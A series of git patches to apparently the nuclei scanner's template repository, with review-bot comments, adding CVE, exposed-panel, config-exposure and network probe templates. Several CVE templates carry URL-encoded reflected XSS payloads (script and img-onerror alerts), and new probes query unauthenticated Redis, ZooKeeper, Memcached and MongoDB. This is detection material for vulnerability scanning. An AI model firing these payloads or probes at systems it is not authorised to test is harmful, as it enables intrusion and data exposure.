From f8720698b6c4cc066e67cc288d2d7859444a607b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 9 Mar 2021 14:15:09 +0530 Subject: [PATCH 308/370] Added "text/html" matcher --- cves/2020/CVE-2020-12256.yaml | 8 ++++++-- cves/2020/CVE-2020-12258.yaml | 26 -------------------------- cves/2020/CVE-2020-12259.yaml | 8 ++++++-- 3 files changed, 12 insertions(+), 30 deletions(-) delete mode 100644 cves/2020/CVE-2020-12258.yaml diff --git a/cves/2020/CVE-2020-12256.yaml b/cves/2020/CVE-2020-12256.yaml index 2387a01575..a95e8d7a5b 100644 --- a/cves/2020/CVE-2020-12256.yaml +++ b/cves/2020/CVE-2020-12256.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/devicemgmt.php?deviceId=">' + - '{{BaseURL}}/devicemgmt.php?deviceId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -19,8 +19,12 @@ requests: words: - "" part: body - condition: and - type: status status: - 200 + + - type: word + part: header + words: + - "text/html" \ No newline at end of file diff --git a/cves/2020/CVE-2020-12258.yaml b/cves/2020/CVE-2020-12258.yaml deleted file mode 100644 index 7b0a9099b8..0000000000 --- a/cves/2020/CVE-2020-12258.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2020-12258 - -info: - name: rConfig 3.9.4 XSS - author: pikpikcu - severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12258 - tags: cve,cve2020,rconfig,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/configDevice.php?rid=">' - - matchers-condition: and - matchers: - - - type: word - words: - - '' - part: body - condition: and - - - type: status - status: - - 200 diff --git a/cves/2020/CVE-2020-12259.yaml b/cves/2020/CVE-2020-12259.yaml index f85d3541d9..ea4c5907cd 100644 --- a/cves/2020/CVE-2020-12259.yaml +++ b/cves/2020/CVE-2020-12259.yaml 
@@ -10,7 +10,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/configDevice.php?rid=">' + - '{{BaseURL}}/configDevice.php?rid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -19,8 +19,12 @@ requests: words: - "" part: body - condition: and - type: status status: - 200 + + - type: word + part: header + words: + - "text/html" From 1b30de01329a06e68e251ccf26a5defd6c637110 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 08:46:47 +0000 Subject: [PATCH 309/370] Auto Update README [Tue Mar 9 08:46:47 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 58743a810d..243dd8ec7b 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 229 | vulnerabilities | 105 | exposed-panels | 103 | +| cves | 231 | vulnerabilities | 105 | exposed-panels | 103 | | exposures | 61 | technologies | 50 | misconfiguration | 53 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 693 files**. +**72 directories, 695 files**. From 152957b3a68661576c643f77fd3478ee949c7812 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 9 Mar 2021 14:34:36 +0530 Subject: [PATCH 310/370] Update http-etcd-unauthenticated-api-data-leak.yaml --- .../http-etcd-unauthenticated-api-data-leak.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml b/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml index 8fc195ec40..f9d0431904 100644 
--- a/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml
+++ b/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml
@@ -9,13 +9,21 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}:2379/v2/auth/roles"
+      - "{{BaseURL}}/v2/auth/roles"
     matchers-condition: and
     matchers:
       - type: word
         words:
+          - '"roles"'
+          - '"permissions"'
           - '"role"'
+          - '"kv"'
+        condition: and
         part: body
       - type: status
         status:
           - 200
+      - type: word
+        part: header
+        words:
+          - "text/plain"
From 9dee5fdc5af0667b8bdc45ab833a1bb8d21eb56d Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Tue, 9 Mar 2021 14:36:04 +0530
Subject: [PATCH 311/370] Adding cisco-sd-wan

---
 exposed-panels/cisco-asa-panel.yaml | 1 +
 exposed-panels/cisco-integrated-login.yaml | 1 +
 exposed-panels/cisco-sd-wan.yaml | 25 ++++++++++++++++++++++
 exposed-panels/cisco-security-details.yaml | 1 +
 4 files changed, 28 insertions(+)
 create mode 100644 exposed-panels/cisco-sd-wan.yaml

diff --git a/exposed-panels/cisco-asa-panel.yaml b/exposed-panels/cisco-asa-panel.yaml
index c2dff32b9b..62aa7c0b5d 100644
--- a/exposed-panels/cisco-asa-panel.yaml
+++ b/exposed-panels/cisco-asa-panel.yaml
@@ -4,6 +4,7 @@ info:
   name: Cisco ASA VPN panel detect
   author: organiccrap
   severity: info
+  tags: cisco
 
 requests:
   - method: GET
diff --git a/exposed-panels/cisco-integrated-login.yaml b/exposed-panels/cisco-integrated-login.yaml
index b075e29973..01d18adfab 100644
--- a/exposed-panels/cisco-integrated-login.yaml
+++ b/exposed-panels/cisco-integrated-login.yaml
@@ -5,6 +5,7 @@ info:
   author: dhiyaneshDK
   severity: info
   reference: https://www.exploit-db.com/ghdb/3859
+  tags: cisco
 
 requests:
   - method: GET
diff --git a/exposed-panels/cisco-sd-wan.yaml b/exposed-panels/cisco-sd-wan.yaml
new file mode 100644
index 0000000000..c156f1460f
--- /dev/null
+++ b/exposed-panels/cisco-sd-wan.yaml
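Review bot: The new `text/plain` header matcher is ANDed with the body and status matchers, so if etcd serves `/v2/auth/roles` with `Content-Type: application/json` — which is what I would expect from its v2 HTTP API, though I have not confirmed it — the template can never match; please verify against a real instance and either drop this matcher or change the word to `"application/json"`. If the plain-text check is deliberate, a one-line comment above it stating which etcd version was observed returning it would stop the next reader from "fixing" it.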
@@ -0,0 +1,25 @@ +id: cisco-sd-wan + +info: + name: Cisco SD-WAN panel + author: z3bd + severity: info + reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj + tags: cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + words: + - "SD-Wan Center" + part: body \ No newline at end of file diff --git a/exposed-panels/cisco-security-details.yaml b/exposed-panels/cisco-security-details.yaml index a6d57e0007..8ddd313415 100644 --- a/exposed-panels/cisco-security-details.yaml +++ b/exposed-panels/cisco-security-details.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6708 + tags: cisco requests: - method: GET From b462b64361339fc80f7f480561e1a41429048488 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 09:06:32 +0000 Subject: [PATCH 312/370] Auto Update README [Tue Mar 9 09:06:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 243dd8ec7b..f7b3f44a3d 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 231 | vulnerabilities | 105 | exposed-panels | 103 | +| cves | 232 | vulnerabilities | 105 | exposed-panels | 103 | | exposures | 61 | technologies | 50 | misconfiguration | 53 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 695 files**. +**72 directories, 696 files**. 
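Review bot: The new `cisco-sd-wan.yaml` ends without a trailing newline (`\ No newline at end of file`), unlike the three sibling panel templates touched in the same commit. The `reference` points at a Cisco buffer-overflow advisory although the template is an `info`-severity panel detection, so a reader may mistake it for a vulnerability check; either a reference to the product's login page or a comment such as `# panel detection only; advisory linked for product context` would make the intent clear.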
From 9463ecbfd9f803675ea5d072c793469d47ced431 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 09:06:37 +0000 Subject: [PATCH 313/370] Auto Update README [Tue Mar 9 09:06:37 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 243dd8ec7b..2750ba3681 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 231 | vulnerabilities | 105 | exposed-panels | 103 | +| cves | 231 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 53 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 695 files**. +**72 directories, 696 files**. From 78eaa8eb9016f1b8a5c03220b828eacaffd85083 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 09:07:12 +0000 Subject: [PATCH 314/370] Auto Update README [Tue Mar 9 09:07:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f7b3f44a3d..802970c755 100644 --- a/README.md +++ b/README.md 
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 232 | vulnerabilities | 105 | exposed-panels | 103 | -| exposures | 61 | technologies | 50 | misconfiguration | 53 | +| exposures | 61 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 696 files**. +**72 directories, 697 files**. From 16c11858e818e1d29ab2a70ab10fac1993432267 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 09:10:45 +0000 Subject: [PATCH 315/370] Auto Update README [Tue Mar 9 09:10:45 UTC 2021] :robot: --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index c0817c699e..af19ac98af 100644 --- a/README.md +++ b/README.md @@ -37,14 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 231 | vulnerabilities | 105 | exposed-panels | 104 | -| cves | 232 | vulnerabilities | 105 | exposed-panels | 103 | +| cves | 232 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 697 files**. +**72 directories, 698 files**. From 27412498751acf10a3c5edcb4b00b3327104fdb2 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Tue, 9 Mar 2021 14:45:03 +0530 Subject: [PATCH 316/370] Update CVE-2020-14413.yaml --- cves/2020/CVE-2020-14413.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml index 02f0fa97eb..a519234e4b 100644 --- a/cves/2020/CVE-2020-14413.yaml +++ b/cves/2020/CVE-2020-14413.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/Devices-Config.php?sta=">' + - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E' matchers-condition: and matchers: @@ -19,8 +19,12 @@ requests: words: - "" part: body - condition: and - type: status status: - 200 + + - type: word + part: header + words: + - "text/html" \ No newline at end of file From 1c94e7bc229eeb568dcafce1220472f7382377bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 09:17:02 +0000 Subject: [PATCH 317/370] Auto Update README [Tue Mar 9 09:17:02 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index af19ac98af..edec0ebcaf 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 232 | vulnerabilities | 105 | exposed-panels | 104 | +| cves | 233 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 698 files**. +**72 directories, 699 files**. From f7104e0a24cd238c46861432a44300378558f441 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 9 Mar 2021 16:53:40 +0530 Subject: [PATCH 318/370] Adding network templates --- network/exposed-redis.yaml | 26 ++++++++++++++++++++++++++ network/exposed-zookeeper.yaml | 21 +++++++++++++++++++++ network/memcached-stats.yaml | 20 ++++++++++++++++++++ network/mongodb-detect.yaml | 23 +++++++++++++++++++++++ network/mongodb-unauth.yaml | 21 +++++++++++++++++++++ 5 files changed, 111 insertions(+) create mode 100644 network/exposed-redis.yaml create mode 100644 network/exposed-zookeeper.yaml create mode 100644 network/memcached-stats.yaml create mode 100644 network/mongodb-detect.yaml create mode 100644 network/mongodb-unauth.yaml diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml new file mode 100644 index 0000000000..e26d48324c --- /dev/null +++ b/network/exposed-redis.yaml @@ -0,0 +1,26 @@ +id: exposed-redis + +info: + name: Redis Unauth Server + author: pd-team + severity: high + reference: https://redis.io/topics/security + tags: network,redis + +network: + - inputs: + - data: "info\r\nquit\r\n" + + host: + - "{{Hostname}}" + read-size: 2048 + + matchers-condition: and + matchers: + - type: word + words: + - "redis_version" + - type: word + negative: true + words: + - "redis_mode:sentinel" \ No newline at end of file diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml new file mode 100644 index 0000000000..cb9cf1dd71 --- /dev/null +++ b/network/exposed-zookeeper.yaml @@ -0,0 +1,21 @@ +id: exposed-zookeeper + +info: + name: ZooKeeper Unauth Server + author: pd-team + severity: high + reference: https://zookeeper.apache.org/security.html + tags: network,zookeeper + +network: + - inputs: + - data: "envi\r\nquit\r\n" + + host: + - "{{Hostname}}" + read-size: 2048 + + matchers: + - type: word + words: + - "zookeeper.version" \ No newline at end of file 
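Review bot: All five new network templates end without a trailing newline (`\ No newline at end of file` on exposed-redis, exposed-zookeeper, memcached-stats, mongodb-detect and mongodb-unauth). In exposed-redis the negative `redis_mode:sentinel` matcher is left unexplained; a comment above it, `# Sentinel instances also answer INFO; presumably excluded so they are not reported as an exposed Redis data server`, would tell the next maintainer why a positive `redis_version` hit is being discarded.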
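Review bot: The ZooKeeper probe depends on the `envi` four-letter command, which releases from 3.5.3 onward gate behind `4lw.commands.whitelist` (the documented default whitelist is `srvr` only), so a server with default configuration returns nothing and the template stays silent. That is a coverage gap rather than a false positive, but it should be recorded next to the payload: `# envi must be whitelisted via 4lw.commands.whitelist on ZK >= 3.5.3; default-config servers will not answer`.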
diff --git a/network/memcached-stats.yaml b/network/memcached-stats.yaml new file mode 100644 index 0000000000..e6e831c8c1 --- /dev/null +++ b/network/memcached-stats.yaml @@ -0,0 +1,20 @@ +id: memcached-stats + +info: + name: Memcached stats disclosure + author: pd-team + severity: low + tags: network,memcached + +network: + - inputs: + - data: "stats\r\n\r\nquit\r\n" + + host: + - "{{Hostname}}" + read-size: 2048 + + matchers: + - type: word + words: + - "STAT " \ No newline at end of file diff --git a/network/mongodb-detect.yaml b/network/mongodb-detect.yaml new file mode 100644 index 0000000000..da8deba9c4 --- /dev/null +++ b/network/mongodb-detect.yaml @@ -0,0 +1,23 @@ +id: mongodb-detect + +info: + name: MongoDB Detection + author: pd-team + severity: info + reference: https://github.com/orleven/Tentacle + tags: network,mongodb + +network: + - inputs: + - data: 3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000 + type: hex + + host: + - "{{Hostname}}" + read-size: 2048 + + matchers: + - type: word + words: + - "logicalSessionTimeout" + - "localTime" \ No newline at end of file diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml new file mode 100644 index 0000000000..a8febc3c70 --- /dev/null +++ b/network/mongodb-unauth.yaml @@ -0,0 +1,21 @@ +id: mongodb-unauth + +info: + name: Unauth MongoDB Disclosure + author: pd-team + severity: high + reference: https://github.com/orleven/Tentacle + tags: network,mongodb + +network: + - inputs: + - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 + type: hex + + host: + - "{{Hostname}}" + read-size: 2048 + matchers: + - type: word + words: + - "totalLinesWritten" \ No newline at end of file From 67d194337d77661fd1ac6ccdbbdcf9fba9f01231 Mon Sep 17 00:00:00 2001 
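Review bot: The memcached payload `"stats\r\n\r\nquit\r\n"` contains an empty command line between `stats` and `quit`, which memcached answers with an `ERROR` line; the `STAT ` match is unaffected, but the extra `\r\n` looks unintended and `"stats\r\nquit\r\n"` would mirror the redis and zookeeper templates in the same commit.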
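Review bot: The hex `data:` payloads in mongodb-unauth and mongodb-detect are opaque as committed; the ASCII embedded in them decodes to `admin.$cmd`, `getLog` and `startupWarnings` (and `ismaster` in mongodb-detect), with opcode `d4070000` = 2004 (OP_QUERY), so a comment above each `data:` line such as `# OP_QUERY to admin.$cmd: { getLog: "startupWarnings" }` would let a reviewer relate the `totalLinesWritten` matcher to the request without a hex decoder. `mongodb-unauth.yaml` also omits the blank line between `read-size` and `matchers:` that the other four templates keep, and like them has no trailing newline.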
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 9 Mar 2021 16:58:33 +0530 Subject: [PATCH 319/370] Adding ports for related services --- network/exposed-redis.yaml | 2 +- network/exposed-zookeeper.yaml | 2 +- network/memcached-stats.yaml | 2 +- network/mongodb-detect.yaml | 2 +- network/mongodb-unauth.yaml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml index e26d48324c..b3a6723804 100644 --- a/network/exposed-redis.yaml +++ b/network/exposed-redis.yaml @@ -12,7 +12,7 @@ network: - data: "info\r\nquit\r\n" host: - - "{{Hostname}}" + - "{{Hostname}}:6379" read-size: 2048 matchers-condition: and diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml index cb9cf1dd71..33efe6f865 100644 --- a/network/exposed-zookeeper.yaml +++ b/network/exposed-zookeeper.yaml @@ -12,7 +12,7 @@ network: - data: "envi\r\nquit\r\n" host: - - "{{Hostname}}" + - "{{Hostname}}:2181" read-size: 2048 matchers: diff --git a/network/memcached-stats.yaml b/network/memcached-stats.yaml index e6e831c8c1..5252fd2b3f 100644 --- a/network/memcached-stats.yaml +++ b/network/memcached-stats.yaml @@ -11,7 +11,7 @@ network: - data: "stats\r\n\r\nquit\r\n" host: - - "{{Hostname}}" + - "{{Hostname}}:11211" read-size: 2048 matchers: diff --git a/network/mongodb-detect.yaml b/network/mongodb-detect.yaml index da8deba9c4..7ba70d3c82 100644 --- a/network/mongodb-detect.yaml +++ b/network/mongodb-detect.yaml @@ -13,7 +13,7 @@ network: type: hex host: - - "{{Hostname}}" + - "{{Hostname}}:27017" read-size: 2048 matchers: diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml index a8febc3c70..eccd19ea30 100644 --- a/network/mongodb-unauth.yaml +++ b/network/mongodb-unauth.yaml @@ -13,7 +13,7 @@ network: type: hex host: - - "{{Hostname}}" + - "{{Hostname}}:27017" read-size: 2048 matchers: - type: word From 31d4748c8369d10abc80ffe3307767f4b5e4f2ce Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Tue, 9 Mar 2021 11:29:00 +0000 Subject: [PATCH 320/370] Auto Update README [Tue Mar 9 11:29:00 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index edec0ebcaf..f50e859c2d 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 699 files**. +**73 directories, 704 files**. From f530dfa11601890a2ec467e4ecc97c2d6be2ff62 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 9 Mar 2021 17:03:30 +0530 Subject: [PATCH 321/370] support both user input + expected port --- network/exposed-redis.yaml | 1 + network/exposed-zookeeper.yaml | 1 + network/memcached-stats.yaml | 1 + network/mongodb-detect.yaml | 1 + network/mongodb-unauth.yaml | 1 + 5 files changed, 5 insertions(+) diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml index b3a6723804..ee683481cd 100644 --- a/network/exposed-redis.yaml +++ b/network/exposed-redis.yaml @@ -12,6 +12,7 @@ network: - data: "info\r\nquit\r\n" host: + - "{{Hostname}}" - "{{Hostname}}:6379" read-size: 2048 diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml index 33efe6f865..027a490123 100644 --- a/network/exposed-zookeeper.yaml +++ b/network/exposed-zookeeper.yaml @@ -12,6 +12,7 @@ network: - data: "envi\r\nquit\r\n" host: + - "{{Hostname}}" - "{{Hostname}}:2181" read-size: 2048 diff --git a/network/memcached-stats.yaml b/network/memcached-stats.yaml index 5252fd2b3f..62f8e25bae 100644 --- a/network/memcached-stats.yaml +++ b/network/memcached-stats.yaml @@ -11,6 +11,7 @@ network: - data: "stats\r\n\r\nquit\r\n" host: + - "{{Hostname}}" - "{{Hostname}}:11211" read-size: 2048 
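Review bot: Listing both `{{Hostname}}` and `{{Hostname}}:6379` (likewise `:2181` and `:11211` here, and `:27017` in the two mongodb hunks that follow) means an input that already names the default port is probed twice, and an input such as `host:6379` presumably renders the second entry as `host:6379:6379` unless the engine normalises it — worth one check against an input with an explicit port. A comment above the list, `# probe the input as given and the service's default port`, would also make the duplication read as deliberate rather than accidental.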
diff --git a/network/mongodb-detect.yaml b/network/mongodb-detect.yaml index 7ba70d3c82..55716383b9 100644 --- a/network/mongodb-detect.yaml +++ b/network/mongodb-detect.yaml @@ -13,6 +13,7 @@ network: type: hex host: + - "{{Hostname}}" - "{{Hostname}}:27017" read-size: 2048 diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml index eccd19ea30..6d8c522a1d 100644 --- a/network/mongodb-unauth.yaml +++ b/network/mongodb-unauth.yaml @@ -13,6 +13,7 @@ network: type: hex host: + - "{{Hostname}}" - "{{Hostname}}:27017" read-size: 2048 matchers: From 541635d3c5b3099c1118f0018200af115f80c6cb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 20:26:46 +0000 Subject: [PATCH 322/370] Auto Update README [Tue Mar 9 20:26:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index edec0ebcaf..fd859f3c48 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 233 | vulnerabilities | 105 | exposed-panels | 104 | +| cves | 234 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 699 files**. +**72 directories, 700 files**. From c4fbeb6ad42ba2be6d3eff1a82ce2d449ce3b6a1 Mon Sep 17 00:00:00 2001 
From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 20:49:46 +0000 Subject: [PATCH 323/370] Update docker-compose-config.yml Remove duplicate line and add support for docker-compose.override.yml --- exposures/configs/docker-compose-config.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/exposures/configs/docker-compose-config.yml b/exposures/configs/docker-compose-config.yml index 0cb1a9a1d4..b5b7c104e9 100644 --- a/exposures/configs/docker-compose-config.yml +++ b/exposures/configs/docker-compose-config.yml @@ -2,7 +2,7 @@ id: docker-compose-config info: name: docker-compose.yml exposure - author: meme-lord & blckraven + author: meme-lord & blckraven & geeknik severity: medium requests: @@ -15,7 +15,8 @@ requests: - "{{BaseURL}}/docker-compose.production.yml" - "{{BaseURL}}/docker-compose.staging.yml" - "{{BaseURL}}/docker-compose.dev.yml" - - "{{BaseURL}}/docker-compose-dev.yml" + - "{{BaseURL}}/docker-compose.override.yml" + matchers-condition: and matchers: - type: dsl From 0e9b40a2124ec64d0e6ebbb8fc46a63d4ee434b7 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 20:52:45 +0000 Subject: [PATCH 324/370] Update docker-compose-config.yml My bad, wasn't a duplicate line. Guess I need my eyes checked. \m/ --- exposures/configs/docker-compose-config.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/docker-compose-config.yml b/exposures/configs/docker-compose-config.yml index b5b7c104e9..1a6259d516 100644 --- a/exposures/configs/docker-compose-config.yml +++ b/exposures/configs/docker-compose-config.yml @@ -15,6 +15,7 @@ requests: - "{{BaseURL}}/docker-compose.production.yml" - "{{BaseURL}}/docker-compose.staging.yml" - "{{BaseURL}}/docker-compose.dev.yml" + - "{{BaseURL}}/docker-compose-dev.yml" - "{{BaseURL}}/docker-compose.override.yml" matchers-condition: and From 13155a5e705057306e678d8ff6f2baefc298bad4 Mon Sep 17 00:00:00 2001 
From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:10:42 +0000 Subject: [PATCH 325/370] Create circleci-config.yaml --- exposures/configs/circleci-config.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/circleci-config.yaml diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml new file mode 100644 index 0000000000..bd3b8c8df1 --- /dev/null +++ b/exposures/configs/circleci-config.yaml @@ -0,0 +1,25 @@ +id: circleci-config + +info: + name: circleci config.yml exposure + author: geeknik + severity: medium + reference: https://circleci.com/docs/2.0/sample-config/ + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/config.yml" + - "{{BaseURL}}/.circleci/config.yml" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'regex("^version: ", body) && contains(body, "jobs:") == true' + + - type: status + status: + - 200 From 223d3903886167c1c3cb7190bdbfeb22e222d8d5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:15:59 +0000 Subject: [PATCH 326/370] Update circleci-config.yaml Changing severity from medium to low. --- exposures/configs/circleci-config.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml index bd3b8c8df1..4c5593a45a 100644 --- a/exposures/configs/circleci-config.yaml +++ b/exposures/configs/circleci-config.yaml @@ -3,7 +3,7 @@ id: circleci-config info: name: circleci config.yml exposure author: geeknik - severity: medium + severity: low reference: https://circleci.com/docs/2.0/sample-config/ requests: From 0bfb348b744173a0eb11ed6786786f70467fbaf5 Mon Sep 17 00:00:00 2001 
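Review bot: In the dsl matcher `contains(body, "jobs:") == true` the `== true` is redundant because `contains` already yields a boolean; `regex("^version: ", body) && contains(body, "jobs:")` reads cleaner. Whether `^` is multi-line in this engine is not visible here; if it anchors only the start of the whole body, a config that opens with a comment or a `---` document marker is missed, and `regex("(?m)^version: ", body)` would match `version:` at the start of any line.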
